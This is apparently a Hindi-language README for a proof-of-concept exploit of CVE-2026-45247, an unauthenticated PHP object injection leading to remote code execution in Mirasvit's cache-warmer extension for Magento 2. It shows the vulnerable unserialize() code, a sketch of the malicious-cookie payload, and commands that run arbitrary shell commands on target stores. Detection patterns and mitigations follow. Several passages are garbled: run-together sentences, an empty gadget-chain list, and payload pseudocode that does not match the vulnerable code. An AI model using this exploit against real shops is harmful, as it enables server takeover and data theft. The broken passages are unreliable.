
CVE-2026-45247 - Mirasvit Full Page Cache Warmer for Magento 2 में बिना प्रमाणीकरण के PHP ऑब्जेक्ट इंजेक्शन -> रिमोट कोड निष्पादन
CVE-2026-45247 Magento 2 और Adobe Commerce के लिए Mirasvit Full Page Cache Warmer एक्सटेंशन में एक गंभीर PHP ऑब्जेक्ट इंजेक्शन भेद्यता है। एक अप्रमाणित हमलावर CacheWarmer कुकी में एक हेरफेर किए गए सीरियलाइज़्ड PHP ऑब्जेक्ट भेजकर रिमोट कोड निष्पादन (RCE) प्राप्त कर सकता है।
यह भेद्यता PHP के मूल unserialize() फ़ंक्शन के अप्रतिबंधित कॉल में निहित है, जो Magento और उसकी निर्भरताओं (विशेष रूप से Monolog) में उपलब्ध गैजेट श्रृंखलाओं (gadget chains) के साथ संयुक्त है।
CacheWarmer कुकी को हर स्टोर अनुरोध पर प्रोसेस करता हैunserialize() को पास किया जाता हैSyslogUdpHandler, BufferHandler, FingersCrossedHandler) का उपयोग करके RCE प्राप्त किया जाता है# जाँच करें कि स्टोर Mirasvit Cache Warmer का उपयोग करता है या नहीं
curl -s https://tienda.com/pub/media/mirasvit/cache_warmer/CHANGELOG.md
# कुकी बिना प्रमाणीकरण के प्रत्येक अनुरोध पर प्रोसेस की जाती है
# Mirasvit में भेद्य कोड:
$cookieValue = $_COOKIE['CacheWarmer'];
$data = unserialize(base64_decode($cookieValue)); # खतरा!
# दुर्भावनापूर्ण कुकी का निर्माण
payload = serialize(PHPObjectInjection())
cookie_value = f"CacheWarmer:{base64_encode(payload)}"
# अनुरोध भेजना
requests.get(target, cookies={'CacheWarmer': cookie_value})
git clone https://github.com/tu-usuario/CVE-2026-45247.git
cd CVE-2026-45247
pip install requests
# भेद्यता की जाँच करें
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com --check-only
# 'id' कमांड निष्पादित करें
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "id"
# कस्टम कमांड निष्पादित करें
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "whoami"
# डिबगिंग के लिए प्रॉक्सी का उपयोग करें
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "ls -la" --proxy http://127.0.0.1:8080
# bash स्क्रिप्ट से जाँच करें
chmod +x check_cve_2026_45247.sh
./check_cve_2026_45247.sh https://tienda.ejemplo.com
एक्सेस लॉग में:
CacheWarmer: (Tz|Qz|YT)[a-zA-Z0-9+/=]+
शोषण में देखे गए कमांड:
echo PWNED_CVE2026_$(date +%s)
sleep 5
उपयोग की गई गैजेट श्रृंखलाएँ:
# पैच संस्करण में अद्यतन करें
composer require mirasvit/module-cache-warmer:1.11.12
bin/magento cache:flush
# .htaccess या nginx में CacheWarmer कुकी को ब्लॉक करें
RewriteCond %{HTTP_COOKIE} CacheWarmer
RewriteRule .* - [F,L]
// app/code/local/Custom/BlockCookie.php में
if (isset($_COOKIE['CacheWarmer'])) {
unset($_COOKIE['CacheWarmer']);
}
| गुण | मान |
|---|
| CVE | CVE-2026-45247 |
| उत्पाद | Magento 2 के लिए Mirasvit Full Page Cache Warmer |
| प्रभावित संस्करण | 1.11.12 से पहले के सभी संस्करण |
| उपलब्ध पैच | संस्करण 1.11.12 (25 मई 2026) |
| CVSS स्कोर | 9.8 (गंभीर) |
| वेक्टर | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CISA KEV में स्थिति | सक्रिय शोषण की पुष्टि (03/06/2026 को जोड़ा गया) |
| अंतिम तिथि | 06/06/2026 |